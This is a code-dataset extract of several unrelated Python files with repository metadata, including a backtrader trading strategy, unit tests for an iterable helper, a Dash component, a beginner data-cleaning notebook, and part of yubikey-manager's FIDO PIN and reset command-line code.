# dbundle.append({'addr':"/smile", 'args': ["/sfopenpath", sfopenpath ]})
# if sfrecpath!='':
# dbundle.append({'addr':"/smile", 'args': ["/sfrecpath", sfrecpath ]})
self.client.send(dbundle)
def ZigSfRecIter(self):
dbundle = OSC.OSCBundle()
dbundle.append({'addr':"/miconoff", 'args':0})
# dbundle.append({'addr':"/sffoldername", 'args':sffoldername})
dbundle.append({'addr':"/sfrec", 'args':1})
self.client.send(dbundle)
| 39.59596
| 187
| 0.589626
|
cc356e0300f23dd55abdd82bb139e1457732490a
| 4,213
|
py
|
Python
|
Storage/q_pack/q_strategies/simple_strategy_2.py
|
Alba-Intelligence/Microservices-Based-Algorithmic-Trading-System
|
78a2b8d485a799fe5759f024b202355e94aeeb10
|
[
"BSD-3-Clause"
] | 207
|
2020-01-09T14:07:47.000Z
|
2022-03-24T00:04:37.000Z
|
Storage/q_pack/q_strategies/simple_strategy_2.py
|
snorics/Microservices-Based-Algorithmic-Trading-System
|
454b6fb679c1b59a2f7e3aac7b2167901c9b4f2d
|
[
"BSD-3-Clause"
] | 9
|
2020-02-11T14:10:27.000Z
|
2021-11-10T11:42:04.000Z
|
Storage/q_pack/q_strategies/simple_strategy_2.py
|
snorics/Microservices-Based-Algorithmic-Trading-System
|
454b6fb679c1b59a2f7e3aac7b2167901c9b4f2d
|
[
"BSD-3-Clause"
] | 92
|
2020-01-10T01:23:37.000Z
|
2022-03-21T19:23:10.000Z
|
import backtrader as bt
import backtrader.indicators as btind
import datetime
import psycopg2
import pandas as pd
import os
import mlflow.pyfunc
class St(bt.Strategy):
alias = 'Simple Strategy'
params = dict(
period=10,
limdays=200,
backtest=True,
ml_serving=False,
model_uri="24cbdab283244fac8d54405d58b2bbf1"
)
def log(self, arg):
if not self.p.backtest:
print('{} {}'.format(self.datetime.datetime(), arg))
def __init__(self):
self.db_run_id = None
self.rsi = [bt.indicators.RSI(d, period=30) for d in self.datas]
self.stoc = [bt.indicators.Stochastic(d, period=20) for d in self.datas]
self.atr = [bt.indicators.ATR(d, period=5) for d in self.datas]
for i in self.rsi:
i.aliased='RSI'
for i in self.stoc:
i.aliased='STOCHASTIC'
for i in self.atr:
i.aliased='ATR'
self.order = None
self.buyprice = None
self.buycomm = None
# if arg:
if self.p.backtest:
self.datastatus = 1
else:
self.datastatus = 0
if self.p.ml_serving:
print("s3://mlflow-models/"+self.p.model_uri+"/artifacts/model")
self.model_predict=mlflow.pyfunc.load_model(model_uri=("s3://mlflow-models/"+self.p.model_uri+"/artifacts/model"))
def notify_data(self, data, status, *args, **kwargs):
print('*' * 5, 'DATA NOTIF:', data._getstatusname(status), *args)
if status == data.LIVE:
self.datastatus = 1
def notify_order(self, order):
if (order.status>1): # 0 and 1 are created and submitted
self.log('Order Status: {}: Ref: {}, Size: {}, Price: {}' \
.format(order.Status[order.status], order.ref, order.size,
'NA' if not order.price else round(order.price,5)))
def notify_trade(self, trade):
if not trade.isclosed:
return
self.log('OPERATION PROFIT, GROSS %.5f, NET %.2f' %
(trade.pnl, trade.pnlcomm))
def next(self):
for i, d in enumerate(self.datas):
dt, dn = self.datetime.datetime(), d._name
pos = self.getposition(d).size
order_valid = datetime.timedelta(self.p.limdays)
if self.datastatus and pos==0:
if self.p.ml_serving:
pred=self.model_predict.predict([[self.rsi[i][0],self.stoc[i][0]]])[0]
if pred>0:
price_sl = d.close[0]-(self.atr[0] * 1)
price_tp = d.close[0]+(self.atr[0] * 2)
self.order=self.buy_bracket(data=d,exectype=bt.Order.Market , stopprice=price_sl, limitprice=price_tp, valid=order_valid) #, valid=order_valid,price=None
self.log('BUY CREATE {:.2f} at {}'.format(d.close[0],dn))
elif pred<=0:
price_sl = d.close[0]+(self.atr[0] * 1)
price_tp = d.close[0]-(self.atr[0] * 2)
self.order=self.sell_bracket(data=d,exectype=bt.Order.Market, stopprice=price_sl, limitprice=price_tp, valid=order_valid)
self.log('SELL CREATE {:.2f} at {}'.format(d.close[0],dn))
elif self.rsi[i] < 40:
price_sl = d.close[0]-(self.atr[0] * 1)
price_tp = d.close[0]+(self.atr[0] * 2)
self.order=self.buy_bracket(data=d,exectype=bt.Order.Market , stopprice=price_sl, limitprice=price_tp, valid=order_valid) #, valid=order_valid,price=None
self.log('BUY CREATE {:.2f} at {}'.format(d.close[0],dn))
elif self.rsi[i] > 60:
price_sl = d.close[0]+(self.atr[0] * 1)
price_tp = d.close[0]-(self.atr[0] * 2)
self.order=self.sell_bracket(data=d,exectype=bt.Order.Market, stopprice=price_sl, limitprice=price_tp, valid=order_valid)
self.log('SELL CREATE {:.2f} at {}'.format(d.close[0],dn))
def stop(self):
print("Strategy run finished with Run ID:",self.db_run_id)
| 39.745283
| 177
| 0.552575
|
95a5af4a3e6c1414bccfe4cb7269f01d2219e7da
| 3,714
|
py
|
Python
|
tests/test_iterable.py
|
deeprave/pylib
|
53ec7e922c8474c08f62068361b5529ac0a21e6a
|
[
"Apache-2.0"
] | null | null | null |
tests/test_iterable.py
|
deeprave/pylib
|
53ec7e922c8474c08f62068361b5529ac0a21e6a
|
[
"Apache-2.0"
] | null | null | null |
tests/test_iterable.py
|
deeprave/pylib
|
53ec7e922c8474c08f62068361b5529ac0a21e6a
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
from unittest import TestCase
from pylib.iterable import is_iterable, iterable
class Counter(object):
"""
Sample iterable class
"""
def __init__(self, low=1, high=10):
self.current = self.low = low
self.high = high
def __next__(self):
if self.current > self.high:
raise StopIteration
self.current += 1
return self.current - 1
def next(self):
return self.__next__()
def __iter__(self):
return self
def generator(start_value, multiplier):
value = start_value
while True:
yield value
value *= multiplier
# noinspection SpellCheckingInspection
class TestIsIterable(TestCase):
def test_list_isiterable(self):
self.assertTrue(is_iterable([]))
self.assertTrue(is_iterable([1, 3, 4]))
my_list = [1, 'two', 'FIVE', 9]
self.assertTrue(is_iterable(my_list))
def test_iter_isiterable(self):
self.assertTrue(is_iterable([]))
my_list_iterator = iter([1, 'two', 'FIVE', 9])
self.assertTrue(is_iterable(my_list_iterator))
def test_dict_isiterable(self):
self.assertTrue(is_iterable({}))
self.assertTrue(is_iterable({'one': 1, 2: 'two', 'three': 'third'}))
my_dict = {1: 'one', 'two': 2, 'third': 'three'}
self.assertTrue(is_iterable(my_dict))
def test_bytes_isNOTiterable(self):
self.assertFalse(is_iterable(b''))
self.assertFalse(is_iterable(b'1234567890abcdefg'))
def test_str_isNOTiterable(self):
self.assertFalse(is_iterable(b''))
self.assertFalse(is_iterable(b'1234567890abcdefg'))
def test_raw_string_isNOTiterable(self):
self.assertFalse(is_iterable(r''))
self.assertFalse(is_iterable(r'\rthis is a raw string\n'))
def test_iterable_is_iterable(self):
counter = Counter()
self.assertTrue(is_iterable(counter))
def test_generator_is_iterable(self):
gen_func = generator(1, 2)
self.assertTrue(is_iterable(gen_func))
class TestIterable(TestCase):
def test_make_str_iterable(self):
test_string = 'test string'
test_strings = iterable(test_string)
self.assertTrue(is_iterable(test_strings))
self.assertIn(test_string, test_strings)
def test_make_bytes_iterable(self):
test_bytes = b'test string'
test_bytes_list = iterable(test_bytes)
self.assertTrue(is_iterable(test_bytes_list))
self.assertIn(test_bytes, test_bytes_list)
def test_make_numeric_iterable(self):
test_numeric = 1234
test_numeric_list = iterable(test_numeric)
self.assertTrue(is_iterable(test_numeric_list))
self.assertIn(test_numeric, test_numeric_list)
def test_make_floats_iterable(self):
test_numeric = 1234.056789
test_numeric_list = iterable(test_numeric)
self.assertTrue(is_iterable(test_numeric_list))
self.assertIn(test_numeric, test_numeric_list)
def test_list_is_already_iterable(self):
test_list = ['one', 2, 'three', 'four', 5]
self.assertTrue(is_iterable(test_list))
test_list2 = iterable(test_list)
self.assertTrue(is_iterable(test_list2))
self.assertListEqual(test_list, test_list2)
self.assertEqual(test_list, test_list2)
def test_dict_is_already_iterable(self):
test_dict = {'one': 1, 2: 'two', 'three': 3, 'four': 4, 5: 'five'}
self.assertTrue(is_iterable(test_dict))
test_dict2 = iterable(test_dict)
self.assertTrue(is_iterable(test_dict2))
self.assertDictEqual(test_dict, test_dict2)
self.assertEqual(test_dict, test_dict2)
| 31.74359
| 76
| 0.667205
|
34b9d26fcbdcac80ee8e6db2f9c68ba497124e8f
| 293
|
py
|
Python
|
selenium_demo/selenium_demo/pipelines.py
|
zhaohandd/Web_Crawler
|
b4ccbcce95fd1c037d1c8a6ae9b269eeb9928440
|
[
"Apache-2.0"
] | 3
|
2018-10-18T14:50:24.000Z
|
2021-12-30T08:45:33.000Z
|
selenium_demo/selenium_demo/pipelines.py
|
zhaohandd/Web_Crawler
|
b4ccbcce95fd1c037d1c8a6ae9b269eeb9928440
|
[
"Apache-2.0"
] | null | null | null |
selenium_demo/selenium_demo/pipelines.py
|
zhaohandd/Web_Crawler
|
b4ccbcce95fd1c037d1c8a6ae9b269eeb9928440
|
[
"Apache-2.0"
] | 3
|
2019-04-27T15:11:49.000Z
|
2021-09-06T04:47:05.000Z
|
# -*- coding: utf-8 -*-
# Define your item pipelines here
#
# Don't forget to add your pipeline to the ITEM_PIPELINES setting
# See: https://doc.scrapy.org/en/latest/topics/item-pipeline.html
class SeleniumDemoPipeline(object):
def process_item(self, item, spider):
return item
| 24.416667
| 65
| 0.716724
|
b48c82f0ebff24f95108b3e605b6957030ba99aa
| 4,788
|
py
|
Python
|
Project_Code/venv/lib/python3.7/site-packages/dash_html_components/Nextid.py
|
iataylor15/Non-hashed-Password-Cracker
|
c0c407bcbad403e0232ce20a109076e7a452695d
|
[
"MIT"
] | 2
|
2020-04-11T19:28:30.000Z
|
2020-05-04T03:16:20.000Z
|
venv/lib/python3.7/site-packages/dash_html_components/Nextid.py
|
thaiscaldeira/ccinsight
|
94efc5d68234950687d13151b8878bbdeef53eb3
|
[
"BSD-3-Clause"
] | null | null | null |
venv/lib/python3.7/site-packages/dash_html_components/Nextid.py
|
thaiscaldeira/ccinsight
|
94efc5d68234950687d13151b8878bbdeef53eb3
|
[
"BSD-3-Clause"
] | 1
|
2022-03-22T18:23:06.000Z
|
2022-03-22T18:23:06.000Z
|
# AUTO GENERATED FILE - DO NOT EDIT
from dash.development.base_component import Component, _explicitize_args
class Nextid(Component):
"""A Nextid component.
Nextid is a wrapper for the <nextid> HTML5 element.
For detailed attribute info see:
https://developer.mozilla.org/en-US/docs/Web/HTML/Element/nextid
Keyword arguments:
- children (a list of or a singular dash component, string or number; optional): The children of this component
- id (string; optional): The ID of this component, used to identify dash components
in callbacks. The ID needs to be unique across all of the
components in an app.
- n_clicks (number; default 0): An integer that represents the number of times
that this element has been clicked on.
- n_clicks_timestamp (number; default -1): An integer that represents the time (in ms since 1970)
at which n_clicks changed. This can be used to tell
which button was changed most recently.
- key (string; optional): A unique identifier for the component, used to improve
performance by React.js while rendering components
See https://reactjs.org/docs/lists-and-keys.html for more info
- role (string; optional): The ARIA role attribute
- data-* (string; optional): A wildcard data attribute
- aria-* (string; optional): A wildcard aria attribute
- accessKey (string; optional): Keyboard shortcut to activate or add focus to the element.
- className (string; optional): Often used with CSS to style elements with common properties.
- contentEditable (string; optional): Indicates whether the element's content is editable.
- contextMenu (string; optional): Defines the ID of a <menu> element which will serve as the element's context menu.
- dir (string; optional): Defines the text direction. Allowed values are ltr (Left-To-Right) or rtl (Right-To-Left)
- draggable (string; optional): Defines whether the element can be dragged.
- hidden (a value equal to: 'hidden', 'HIDDEN' | boolean; optional): Prevents rendering of given element, while keeping child elements, e.g. script elements, active.
- lang (string; optional): Defines the language used in the element.
- spellCheck (string; optional): Indicates whether spell checking is allowed for the element.
- style (dict; optional): Defines CSS styles which will override styles previously set.
- tabIndex (string; optional): Overrides the browser's default tab order and follows the one specified instead.
- title (string; optional): Text to be displayed in a tooltip when hovering over the element.
- loading_state (dict; optional): Object that holds the loading state object coming from dash-renderer. loading_state has the following type: dict containing keys 'is_loading', 'prop_name', 'component_name'.
Those keys have the following types:
- is_loading (boolean; optional): Determines if the component is loading or not
- prop_name (string; optional): Holds which property is loading
- component_name (string; optional): Holds the name of the component that is loading"""
@_explicitize_args
def __init__(self, children=None, id=Component.UNDEFINED, n_clicks=Component.UNDEFINED, n_clicks_timestamp=Component.UNDEFINED, key=Component.UNDEFINED, role=Component.UNDEFINED, accessKey=Component.UNDEFINED, className=Component.UNDEFINED, contentEditable=Component.UNDEFINED, contextMenu=Component.UNDEFINED, dir=Component.UNDEFINED, draggable=Component.UNDEFINED, hidden=Component.UNDEFINED, lang=Component.UNDEFINED, spellCheck=Component.UNDEFINED, style=Component.UNDEFINED, tabIndex=Component.UNDEFINED, title=Component.UNDEFINED, loading_state=Component.UNDEFINED, **kwargs):
self._prop_names = ['children', 'id', 'n_clicks', 'n_clicks_timestamp', 'key', 'role', 'data-*', 'aria-*', 'accessKey', 'className', 'contentEditable', 'contextMenu', 'dir', 'draggable', 'hidden', 'lang', 'spellCheck', 'style', 'tabIndex', 'title', 'loading_state']
self._type = 'Nextid'
self._namespace = 'dash_html_components'
self._valid_wildcard_attributes = ['data-', 'aria-']
self.available_properties = ['children', 'id', 'n_clicks', 'n_clicks_timestamp', 'key', 'role', 'data-*', 'aria-*', 'accessKey', 'className', 'contentEditable', 'contextMenu', 'dir', 'draggable', 'hidden', 'lang', 'spellCheck', 'style', 'tabIndex', 'title', 'loading_state']
self.available_wildcard_properties = ['data-', 'aria-']
_explicit_args = kwargs.pop('_explicit_args')
_locals = locals()
_locals.update(kwargs) # For wildcard attrs
args = {k: _locals[k] for k in _explicit_args if k != 'children'}
for k in []:
if k not in args:
raise TypeError(
'Required argument `' + k + '` was not specified.')
super(Nextid, self).__init__(children=children, **args)
| 74.8125
| 586
| 0.737886
|
b385e4a4faa1e2f81cd2d665b197ea81d1d98ad3
| 1,719
|
py
|
Python
|
Step_1_Introduction to Python/Python Programming_Beginner/py/4_Challenge_Files, Loops, and Conditional Logic.py
|
augustine0890/Data-Analyst
|
97ec7c208818f3bb55c1ac8c3f1d4bd36570c0a2
|
[
"MIT"
] | null | null | null |
Step_1_Introduction to Python/Python Programming_Beginner/py/4_Challenge_Files, Loops, and Conditional Logic.py
|
augustine0890/Data-Analyst
|
97ec7c208818f3bb55c1ac8c3f1d4bd36570c0a2
|
[
"MIT"
] | null | null | null |
Step_1_Introduction to Python/Python Programming_Beginner/py/4_Challenge_Files, Loops, and Conditional Logic.py
|
augustine0890/Data-Analyst
|
97ec7c208818f3bb55c1ac8c3f1d4bd36570c0a2
|
[
"MIT"
] | null | null | null |
# coding: utf-8
# In[1]:
import pandas as pd
# __Unisex Names__<br>
# - Read the File into a String
# In[2]:
r = open('dq_unisex_names.csv', 'r')
# In[3]:
names = r.read()
# __Convert the string to a list__
# Use the `split()` method that _strings_ have to split on the new-line delimiter (`"\n"`), and assign the resulting _list_ to `names_list`.
# In[4]:
names_list = names.split('\n')
# Select the first five elements in `names_list`, and assign them to `first_five`.
# In[5]:
first_five = names_list[:5]
# In[6]:
first_five
# __Convert the List to Strings to a List of Lists__<br>
# - Split each element in `names_list` on the comma delimiter (`,`) and append the resulting list to `nested_list`.
# In[7]:
nested_list = []
for value in names_list:
comma_list = value.split(',')
nested_list.append(comma_list)
nested_list[0:5]
# __Convert Numerical Values__<br>
# Create a new list of lists called `numerical_list` where:
#
# - The element at index `0` for each list is the unisex name (as a string)
# - The element at index `1` for each list is the number of people who share that name (as a float)
# In[8]:
numerical_list = []
for value in nested_list:
strings = value[0]
floats = float(value[1])
new_list = [strings,floats]
numerical_list.append(new_list)
numerical_list[:5]
# __Filter the List__<br>
# Create a new list of strings called `thousand_or_greater` that only contains the names shared by 1,000 people or more.
# In[9]:
len(numerical_list)
# In[10]:
numerical_list[497]
# In[11]:
thousand_or_greater = []
for value in numerical_list:
if value[1] >= 1000:
thousand_or_greater.append(value)
thousand_or_greater[:5]
| 16.528846
| 140
| 0.685864
|
3f81aa05c5b7db63014b08e81240ff1babb5ac52
| 24,461
|
py
|
Python
|
ykman/cli/fido.py
|
meeuw/yubikey-manager
|
0e6fbaa73397ebc5f4488107d8ffa57159c8cc78
|
[
"BSD-2-Clause"
] | null | null | null |
ykman/cli/fido.py
|
meeuw/yubikey-manager
|
0e6fbaa73397ebc5f4488107d8ffa57159c8cc78
|
[
"BSD-2-Clause"
] | null | null | null |
ykman/cli/fido.py
|
meeuw/yubikey-manager
|
0e6fbaa73397ebc5f4488107d8ffa57159c8cc78
|
[
"BSD-2-Clause"
] | null | null | null |
# Copyright (c) 2018 Yubico AB
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or
# without modification, are permitted provided that the following
# conditions are met:
#
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided
# with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
# ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
from fido2.ctap import CtapError
from fido2.ctap1 import ApduError
from fido2.ctap2 import (
Ctap2,
ClientPin,
CredentialManagement,
FPBioEnrollment,
CaptureError,
)
from fido2.pcsc import CtapPcscDevice
from yubikit.core.fido import FidoConnection
from yubikit.core.smartcard import SW
from time import sleep
from .util import (
click_postpone_execution,
click_prompt,
click_force_option,
ykman_group,
prompt_timeout,
)
from .util import cli_fail
from ..fido import is_in_fips_mode, fips_reset, fips_change_pin, fips_verify_pin
from ..hid import list_ctap_devices
from ..device import is_fips_version
from ..pcsc import list_devices as list_ccid
from smartcard.Exceptions import NoCardException, CardConnectionException
from typing import Optional
import click
import logging
logger = logging.getLogger(__name__)
FIPS_PIN_MIN_LENGTH = 6
PIN_MIN_LENGTH = 4
@ykman_group(FidoConnection)
@click.pass_context
@click_postpone_execution
def fido(ctx):
"""
Manage the FIDO applications.
Examples:
\b
Reset the FIDO (FIDO2 and U2F) applications:
$ ykman fido reset
\b
Change the FIDO2 PIN from 123456 to 654321:
$ ykman fido access change-pin --pin 123456 --new-pin 654321
"""
conn = ctx.obj["conn"]
try:
ctx.obj["ctap2"] = Ctap2(conn)
except (ValueError, CtapError) as e:
logger.info("FIDO device does not support CTAP2: %s", e)
@fido.command()
@click.pass_context
def info(ctx):
"""
Display general status of the FIDO2 application.
"""
conn = ctx.obj["conn"]
ctap2 = ctx.obj.get("ctap2")
if is_fips_version(ctx.obj["info"].version):
click.echo("FIPS Approved Mode: " + ("Yes" if is_in_fips_mode(conn) else "No"))
elif ctap2:
client_pin = ClientPin(ctap2) # N.B. All YubiKeys with CTAP2 support PIN.
if ctap2.info.options["clientPin"]:
if ctap2.info.force_pin_change:
click.echo(
"NOTE: The FIDO PID is disabled and must be changed before it can "
"be used!"
)
pin_retries, power_cycle = client_pin.get_pin_retries()
if pin_retries:
click.echo(f"PIN is set, with {pin_retries} attempt(s) remaining.")
if power_cycle:
click.echo(
"PIN is temporarily blocked. "
"Remove and re-insert the YubiKey to unblock."
)
else:
click.echo("PIN is set, but has been blocked.")
else:
click.echo("PIN is not set.")
bio_enroll = ctap2.info.options.get("bioEnroll")
if bio_enroll:
uv_retries, _ = client_pin.get_uv_retries()
if uv_retries:
click.echo(
f"Fingerprints registered, with {uv_retries} attempt(s) "
"remaining."
)
else:
click.echo(
"Fingerprints registered, but blocked until PIN is verified."
)
elif bio_enroll is False:
click.echo("No fingerprints have been registered.")
always_uv = ctap2.info.options.get("alwaysUv")
if always_uv is not None:
click.echo(
"Always Require User Verification is turned "
+ ("on." if always_uv else "off.")
)
else:
click.echo("PIN is not supported.")
@fido.command("reset")
@click_force_option
@click.pass_context
def reset(ctx, force):
"""
Reset all FIDO applications.
This action will wipe all FIDO credentials, including FIDO U2F credentials,
on the YubiKey and remove the PIN code.
The reset must be triggered immediately after the YubiKey is
inserted, and requires a touch on the YubiKey.
"""
conn = ctx.obj["conn"]
if isinstance(conn, CtapPcscDevice): # NFC
readers = list_ccid(conn._name)
if not readers or readers[0].reader.name != conn._name:
logger.error(f"Multiple readers matched: {readers}")
cli_fail("Unable to isolate NFC reader.")
dev = readers[0]
logger.debug(f"use: {dev}")
is_fips = False
def prompt_re_insert():
click.echo(
"Remove and re-place your YubiKey on the NFC reader to perform the "
"reset..."
)
removed = False
while True:
sleep(0.5)
try:
with dev.open_connection(FidoConnection):
if removed:
sleep(1.0) # Wait for the device to settle
break
except CardConnectionException:
pass # Expected, ignore
except NoCardException:
removed = True
return dev.open_connection(FidoConnection)
else: # USB
n_keys = len(list_ctap_devices())
if n_keys > 1:
cli_fail("Only one YubiKey can be connected to perform a reset.")
is_fips = is_fips_version(ctx.obj["info"].version)
ctap2 = ctx.obj.get("ctap2")
if not is_fips and not ctap2:
cli_fail("This YubiKey does not support FIDO reset.")
def prompt_re_insert():
click.echo("Remove and re-insert your YubiKey to perform the reset...")
removed = False
while True:
sleep(0.5)
keys = list_ctap_devices()
if not keys:
removed = True
if removed and len(keys) == 1:
return keys[0].open_connection(FidoConnection)
if not force:
if not click.confirm(
"WARNING! This will delete all FIDO credentials, including FIDO U2F "
"credentials, and restore factory settings. Proceed?",
err=True,
):
ctx.abort()
if is_fips:
destroy_input = click_prompt(
"WARNING! This is a YubiKey FIPS device. This command will also "
"overwrite the U2F attestation key; this action cannot be undone and "
"this YubiKey will no longer be a FIPS compliant device.\n"
'To proceed, please enter the text "OVERWRITE"',
default="",
show_default=False,
)
if destroy_input != "OVERWRITE":
cli_fail("Reset aborted by user.")
conn = prompt_re_insert()
try:
with prompt_timeout():
if is_fips:
fips_reset(conn)
else:
Ctap2(conn).reset()
except CtapError as e:
logger.error("Reset failed", exc_info=e)
if e.code == CtapError.ERR.ACTION_TIMEOUT:
cli_fail(
"Reset failed. You need to touch your YubiKey to confirm the reset."
)
elif e.code in (CtapError.ERR.NOT_ALLOWED, CtapError.ERR.PIN_AUTH_BLOCKED):
cli_fail(
"Reset failed. Reset must be triggered within 5 seconds after the "
"YubiKey is inserted."
)
else:
cli_fail(f"Reset failed: {e.code.name}")
except ApduError as e: # From fips_reset
logger.error("Reset failed", exc_info=e)
if e.code == SW.COMMAND_NOT_ALLOWED:
cli_fail(
"Reset failed. Reset must be triggered within 5 seconds after the "
"YubiKey is inserted."
)
else:
cli_fail("Reset failed.")
except Exception as e:
logger.error(e)
cli_fail("Reset failed.")
def _fail_pin_error(ctx, e, other="%s"):
if e.code == CtapError.ERR.PIN_INVALID:
cli_fail("Wrong PIN.")
elif e.code == CtapError.ERR.PIN_AUTH_BLOCKED:
cli_fail(
"PIN authentication is currently blocked. "
"Remove and re-insert the YubiKey."
)
elif e.code == CtapError.ERR.PIN_BLOCKED:
cli_fail("PIN is blocked.")
else:
cli_fail(other % e.code)
@fido.group("access")
def access():
"""
Manage the PIN for FIDO.
"""
@access.command("change-pin")
@click.pass_context
@click.option("-P", "--pin", help="Current PIN code.")
@click.option("-n", "--new-pin", help="A new PIN.")
@click.option(
"-u", "--u2f", is_flag=True, help="Set FIDO U2F PIN instead of FIDO2 PIN."
)
def change_pin(ctx, pin, new_pin, u2f):
"""
Set or change the PIN code.
The FIDO2 PIN must be at least 4 characters long, and supports any type
of alphanumeric characters.
On YubiKey FIPS, a PIN can be set for FIDO U2F. That PIN must be at least
6 characters long.
"""
is_fips = is_fips_version(ctx.obj["info"].version)
if is_fips and not u2f:
cli_fail("This is a YubiKey FIPS. To set the U2F PIN, pass the --u2f option.")
if u2f and not is_fips:
cli_fail(
"This is not a YubiKey FIPS, and therefore does not support a U2F PIN. "
"To set the FIDO2 PIN, remove the --u2f option."
)
if is_fips:
conn = ctx.obj["conn"]
else:
ctap2 = ctx.obj.get("ctap2")
if not ctap2:
cli_fail("PIN is not supported on this YubiKey.")
client_pin = ClientPin(ctap2)
def prompt_new_pin():
return click_prompt(
"Enter your new PIN",
default="",
hide_input=True,
show_default=False,
confirmation_prompt=True,
)
def change_pin(pin, new_pin):
if pin is not None:
_fail_if_not_valid_pin(ctx, pin, is_fips)
try:
if is_fips:
try:
# Failing this with empty current PIN does not cost a retry
fips_change_pin(conn, pin or "", new_pin)
except ApduError as e:
if e.code == SW.WRONG_LENGTH:
pin = _prompt_current_pin()
_fail_if_not_valid_pin(ctx, pin, is_fips)
fips_change_pin(conn, pin, new_pin)
else:
raise
else:
client_pin.change_pin(pin, new_pin)
except CtapError as e:
logger.error("Failed to change PIN", exc_info=e)
if e.code == CtapError.ERR.PIN_POLICY_VIOLATION:
cli_fail("New PIN doesn't meet policy requirements.")
else:
_fail_pin_error(ctx, e, "Failed to change PIN: %s")
except ApduError as e:
logger.error("Failed to change PIN", exc_info=e)
if e.code == SW.VERIFY_FAIL_NO_RETRY:
cli_fail("Wrong PIN.")
elif e.code == SW.AUTH_METHOD_BLOCKED:
cli_fail("PIN is blocked.")
else:
cli_fail(f"Failed to change PIN: SW={e.code:04x}")
def set_pin(new_pin):
_fail_if_not_valid_pin(ctx, new_pin, is_fips)
try:
client_pin.set_pin(new_pin)
except CtapError as e:
logger.error("Failed to set PIN", exc_info=e)
if e.code == CtapError.ERR.PIN_POLICY_VIOLATION:
cli_fail("PIN is too long.")
else:
cli_fail(f"Failed to set PIN: {e.code}")
if not is_fips:
if ctap2.info.options.get("clientPin"):
if not pin:
pin = _prompt_current_pin()
else:
if pin:
cli_fail("There is no current PIN set. Use --new-pin to set one.")
if not new_pin:
new_pin = prompt_new_pin()
if is_fips:
_fail_if_not_valid_pin(ctx, new_pin, is_fips)
change_pin(pin, new_pin)
else:
if len(new_pin) < ctap2.info.min_pin_length:
cli_fail("New PIN is too short.")
if ctap2.info.options.get("clientPin"):
change_pin(pin, new_pin)
else:
set_pin(new_pin)
def _require_pin(ctx, pin, feature="This feature"):
ctap2 = ctx.obj.get("ctap2")
if not ctap2:
cli_fail(f"{feature} is not supported on this YubiKey.")
if not ctap2.info.options.get("clientPin"):
cli_fail(f"{feature} requires having a PIN. Set a PIN first.")
if ctap2.info.force_pin_change:
cli_fail("The FIDO PIN is blocked. Change the PIN first.")
if pin is None:
pin = _prompt_current_pin(prompt="Enter your PIN")
return pin
@access.command("verify-pin")
@click.pass_context
@click.option("-P", "--pin", help="Current PIN code.")
def verify(ctx, pin):
"""
Verify the FIDO PIN against a YubiKey.
For YubiKeys supporting FIDO2 this will reset the "retries" counter of the PIN.
For YubiKey FIPS this will unlock the session, allowing U2F registration.
"""
ctap2 = ctx.obj.get("ctap2")
if ctap2:
pin = _require_pin(ctx, pin)
client_pin = ClientPin(ctap2)
try:
# Get a PIN token to verify the PIN.
client_pin.get_pin_token(
pin, ClientPin.PERMISSION.GET_ASSERTION, "ykman.example.com"
)
except CtapError as e:
logger.error("PIN verification failed", exc_info=e)
cli_fail(f"Error: {e}")
elif is_fips_version(ctx.obj["info"].version):
_fail_if_not_valid_pin(ctx, pin, True)
try:
fips_verify_pin(ctx.obj["conn"], pin)
except ApduError as e:
logger.error("PIN verification failed", exc_info=e)
if e.code == SW.VERIFY_FAIL_NO_RETRY:
cli_fail("Wrong PIN.")
elif e.code == SW.AUTH_METHOD_BLOCKED:
cli_fail("PIN is blocked.")
elif e.code == SW.COMMAND_NOT_ALLOWED:
cli_fail("PIN is not set.")
else:
cli_fail(f"PIN verification failed: {e.code.name}")
else:
cli_fail("This YubiKey does not support a FIDO PIN.")
click.echo("PIN verified.")
def _prompt_current_pin(prompt="Enter your current PIN"):
return click_prompt(prompt, default="", hide_input=True, show_default=False)
def _fail_if_not_valid_pin(ctx, pin=None, is_fips=False):
min_length = FIPS_PIN_MIN_LENGTH if is_fips else PIN_MIN_LENGTH
if not pin or len(pin) < min_length:
ctx.fail(f"PIN must be over {min_length} characters long")
def _gen_creds(credman):
data = credman.get_metadata()
if data.get(CredentialManagement.RESULT.EXISTING_CRED_COUNT) == 0:
return # No credentials
for rp in credman.enumerate_rps():
for cred in credman.enumerate_creds(rp[CredentialManagement.RESULT.RP_ID_HASH]):
yield (
rp[CredentialManagement.RESULT.RP]["id"],
cred[CredentialManagement.RESULT.CREDENTIAL_ID],
cred[CredentialManagement.RESULT.USER]["id"],
cred[CredentialManagement.RESULT.USER]["name"],
)
def _format_cred(rp_id, user_id, user_name):
return f"{rp_id} {user_id.hex()} {user_name}"
@fido.group("credentials")
def creds():
"""
Manage discoverable (resident) credentials.
This command lets you manage credentials stored on your YubiKey.
Credential management is only available when a FIDO PIN is set on the YubiKey.
\b
Examples:
\b
List credentials (providing PIN via argument):
$ ykman fido credentials list --pin 123456
\b
Delete a credential by user name (PIN will be prompted for):
$ ykman fido credentials delete example_user
"""
def _init_credman(ctx, pin):
pin = _require_pin(ctx, pin, "Credential Management")
ctap2 = ctx.obj.get("ctap2")
client_pin = ClientPin(ctap2)
try:
token = client_pin.get_pin_token(pin, ClientPin.PERMISSION.CREDENTIAL_MGMT)
